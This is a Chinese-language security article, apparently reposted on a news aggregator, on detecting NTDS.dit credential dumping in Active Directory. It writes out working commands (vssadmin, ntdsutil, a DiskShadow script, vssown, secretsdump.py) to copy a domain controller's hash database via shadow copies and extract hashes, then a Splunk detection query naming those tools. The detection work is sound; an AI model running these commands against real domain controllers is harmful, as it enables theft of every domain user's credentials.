服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

基于AD Event日志检测NTDS凭据转储攻击

日期: 来源:Bypass收集编辑:Bypass

01、简介

在域环境里,域内用户hash存储在域控制器(ntds.dit)中的数据库文件中,ntds.dit文件是无法直接被复制的。在这种情况下,我们一般可以利用卷影复制服务(VSS)来实现ntds.dit的拷贝,然后下载进行离线分析和破解用户哈希。

02、利用VSS实现ntds.dit文件提取

(1)vssadmin

Windows卷影工具,使用Vssadmin来管理VSS,用来创建和删除卷影拷贝。

#创建一个新的卷影副本vssadmin create shadow /for=c:#将ntds.dit文件复制到新的位置copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\ntds.dit#删除卷影副本vssadmin delete shadows /for=c: /quiet

(2)ntdsutil

ntdsutil.exe 是一个命令行工具,可提供对AD的数据库维护功能,执行命令后,生成两个新文件夹:Active Directory 和 Registry,ntds.dit 文件将保存在 Active Directory 中,SAM 和 SYSTEM 文件将保存到registry文件夹。

(3)DiskShadow

Diskshadow.exe是一种工具,用于进行 VSS相关的操作。

a、将如下内容保存在command.txt文件:

set context persistent nowritersadd volume c: alias someAliascreateexpose %someAlias% z:exec "cmd.exe" /c copy z:\\windows\\ntds\\ntds.dit c:\\ntds.ditdelete shadows alllist shadows allresetexit

b、进入C:\Windows\System32目录下执行:

diskshadow /s C:\command.txt

(4)vssown

vssown 是一个 vbs 脚本,可以创建和删除卷影副本,github下载地址:

https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs
#启动卷影拷贝服务cscript vssown.vbs /start#创建一个C盘的卷影拷贝cscript vssown.vbs /create c#列出卷影考本cscript vssown.vbs /list #将目标文件复制出来copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit c:\\ntds.dit#删除卷影拷贝cscript vssown.vbs /delete {71E09CF1-5FF4-4F29-B676-B669A28713DC}

(5)离线破解

通过卷影拷贝服务(vss)提取ntds.dit,需要将ntds.dit、system和sam文件 下载到本地,通过 impacket 套件中的 secretsdump.py 脚本进行破解:

secretsdump.py -sam sam.hive -system system.hive -ntds ntds.dit LOCAL

03、NTDS凭据转存攻击检测

基于以上ntds.dit文件提取的方式,通过AD Event日志监测有两种思路:

(1)在System日志中,调用卷影复制服务(VSS)会生成Event ID为7036的事件,但没有记录用户信息,无法判断来源,容易误报。

(2)在Security日志中,通过监测创建vssadmin、ntdsutil、diskshadow、cscript的进程名称,可以找出谁什么时间在哪台服务器上做了VSS相关的操作,实时检测异常的攻击行为。

index=ad EventCode=4688  match_src_user!="*$" NewProcessName IN ("*vssadmin.exe","*ntdsutil.exe","*diskshadow.exe","*cscript.exe")| stats count  min(_time) as  start_time max(_time) as end_time by  match_src_user ComputerName   NewProcessName| rename match_src_user as user| eval start_time=strftime(start_time,"%Y-%m-%d %H:%M:%S")| eval end_time=strftime(end_time,"%Y-%m-%d %H:%M:%S") | eval message="在"+start_time+"到"+end_time+"时间内,服务器:"+ComputerName +"疑似遭受NTDS凭据转存攻击"+count+"次,新进程:"+NewProcessName+" 操作账号:"+user| table start_time end_time user  message

相关阅读

  • “露这么多,还扭屁股,肯定是擦边女!”

  • 昨天的莓事聊聊发出后,大家对“擦边”与“鉴擦”展开了又一轮热烈讨论。看着雨后春笋般的楼中楼中楼中楼,有些不忍大家的热情与思考止步于此。所以今天我们想重发一篇去年的旧
  • 万字图文 | 你写的代码是如何跑起来的?

  • 大家好,我是飞哥!今天我们来思考一个简单的问题,一个程序是如何在 Linux 上执行起来的?我们就拿全宇宙最简单的 Hello World 程序来举例。#include <stdio.h>int main(){ prin
  • 我在Github上发现了一个好东西!

  • (给程序员零距离加星标,了解项目开发.)粉丝福利:小编会从今天留言中抽选幸运小伙伴赠送现金红包,感谢大家一直以来的支持!文末见喽!作为一个天天都在CRUD的程序员,你有没有想过,数据
  • 告别混乱,设计师如何高效管理文件版本?

  • 产品研发是个快速迭代的过程,随着项目的不断向前推进,就会沉积大量的历史版本,版本的管理也面临着诸多的问题:● 版本呈现不够直观,无法保存和分享特定版本文件,历史版本无法复原;
  • PS终结者!一款治好我强迫症的设计神器

  • 不知不觉之间,Adobe的天平正在逐步倾斜。根据国外近期的一份设计工具调查报告显示,新一代设计工具正越来越受到设计师们的喜爱,相应的,老牌设计工具Photoshop受欢迎程度已有所下

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 基于AD Event日志检测NTDS凭据转储攻击

  • 01、简介在域环境里,域内用户hash存储在域控制器(ntds.dit)中的数据库文件中,ntds.dit文件是无法直接被复制的。在这种情况下,我们一般可以利用卷影复制服务(VSS)来实现ntds.di
  • 基于AD Event日志监测域内信息探测行为

  • 01、简介当攻击者获得内网某台域内服务器的权限,就会以此为起始攻击点,尽可能地去收集域的信息,以获取域控权限作为内网的终极目标。例如,攻击者会在内网中收集域管理员用户列表
  • 基于AD Event日志检测LSASS凭证窃取攻击

  • 01、简介简单介绍一下,LSASS(本地安全机构子系统服务)在本地或域中登录Windows时,用户生成的各种凭证将会存储在LSASS进程的内存中,以便用户不必每次访问系统时重新登录。攻击者
  • 基于AD Event日志识别黄金票据攻击

  • 01、简介黄金票据(Golden Ticket)是基于Kerberos认证的一种攻击方式,常用来做域控权限维持。当攻击者获取到域内krbtgt帐户的SID和HASH,就可以随意伪造域内管理员用户,再加上域
  • 基于AD Event日志实时检测DSRM后门

  • 01、简介每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强
  • 基于AD Event日志识别Skeleton Key后门

  • 01、简介Skeleton Key(万能密码),是一种可以对域内权限进行持久化的操作手法,通过将Skeleton Key注入到lsass进程,无需重启域控即可生效,而且能够在不影响当前域用户正常登录的